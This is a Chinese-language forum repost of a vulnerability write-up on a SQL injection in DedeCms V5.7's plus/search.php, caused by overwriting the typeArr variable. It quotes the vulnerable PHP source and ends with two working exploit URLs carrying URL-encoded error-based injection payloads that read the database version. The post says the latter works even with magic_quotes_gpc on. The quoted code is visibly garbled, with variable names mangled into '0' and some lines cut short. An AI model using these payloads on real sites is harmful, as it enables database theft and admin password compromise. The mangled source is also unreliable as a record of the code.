设为首页 收藏本站
查看: 1969|回复: 0

[经验分享] DedeCms V57 plus/search.php文件SQL注射

[复制链接]

尚未签到

发表于 2018-10-24 09:43:36 | 显示全部楼层 |阅读模式
  微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
  作者: c4rp3nt3r@0x50sec.org
  Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
  黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
  ============
  Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

  •   require_once(dirname(__FILE__).”/../include/common.inc.php”);
  •   require_once(DEDEINC.”/arc.searchview.class.php”);

  •   $pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
  •   0id = (isset(0id) && is_numeric(0id)) ? 0id : 0;
  •   $channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
  •   $kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
  •   $mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

  •   if(!isset($orderby)) $orderby=”;
  •   else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);


  •   if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
  •   else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);

  •   if(!isset($keyword)){
  •   if(!isset($q)) $q = ”;
  •   $keyword=$q;
  •   }

  •   $oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

  •   //查找栏目信息
  •   if(empty(0id))
  •   {
  •   0nameCacheFile = DEDEDATA.’/cache/typename.inc’;
  •   if(!file_exists(0nameCacheFile) || filemtime(0nameCacheFile) < time()-(3600*24) )
  •   {
  •   $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
  •   fwrite($fp, “SetQuery(“Select>
  •   $dsql->Execute();
  •   while($row = $dsql->GetArray())
  •   {
  •   fwrite($fp, “\0Arr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
  •   }
  •   fwrite($fp, ‘?’.'>’);
  •   fclose($fp);
  •   }
  •   //引入栏目缓存并看关键字是否有相关栏目内容
  •   require_once(0nameCacheFile);
  •   //0Arr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
  •   //
  •   if(isset(0Arr) && is_array(0Arr))
  •   {
  •   foreach(0Arr as $id=>0name)
  •   {

  •   $keywordn = str_replace(0name, ‘ ‘, $keyword);  //这个地方要绕过
  •   if($keyword != $keywordn)
  •   {
  •   $keyword = $keywordn;
  •   0id = $id; // 这里存在变量覆盖漏洞使 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0; 这句过滤成了摆设
  •   break;
  •   }
  •   }
  •   }
  •   }
  然后plus/search.php文件下面定义了一个 Search类的对象 .
  在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
  $this->TypeLink = new TypeLink(0id);
  TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.

  •   class TypeLink
  •   {
  •   var 0Dir;
  •   var $dsql;
  •   var $TypeID;
  •   var $baseDir;
  •   var $modDir;
  •   var $indexUrl;
  •   var $indexName;
  •   var $TypeInfos;
  •   var $SplitSymbol;
  •   var $valuePosition;
  •   var $valuePositionName;
  •   var $OptionArrayList;

  •   //构造函数///////
  •   //php5构造函数
  •   function __construct(0id)
  •   {
  •   $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
  •   $this->indexName = $GLOBALS['cfg_indexname'];
  •   $this->baseDir = $GLOBALS['cfg_basedir'];
  •   $this->modDir = $GLOBALS['cfg_templets_dir'];
  •   $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
  •   $this->dsql = $GLOBALS['dsql'];
  •   $this->TypeID = 0id;
  •   $this->valuePosition = ”;
  •   $this->valuePositionName = ”;
  •   $this->typeDir = ”;
  •   $this->OptionArrayList = ”;

  •   //载入类目信息

  •   $query = “SELECT tp.*,ch.typename as
  •   ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
  •   `#@__channeltype` ch
  •   on ch.id=tp.channeltype  WHERE tp.id=’0id’ “; //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿

  •   if(0id > 0)
  •   {
  •   $this->TypeInfos = $this->dsql->GetOne($query);
  利用代码一 需要 即使magic_quotes_gpc = Off
  http:// /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
  这只是其中一个利用代码… Search 类的构造函数再往下

  •   ……省略
  •   $this->TypeID = 0id;
  •   ……省略
  •   if($this->TypeID==”0″){
  •   $this->ChannelTypeid=1;
  •   }else{

  •   $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE>
  •   //现在不鸡肋了吧亲…
  •   $this->ChannelTypeid=$row['channeltype'];

  •   }
  利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
  http:// /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
  如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-625763-1-1.html 上篇帖子: Install Cacti on Ubuntu 14.04 Server 下篇帖子: nagios介绍及Server安装(七)
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表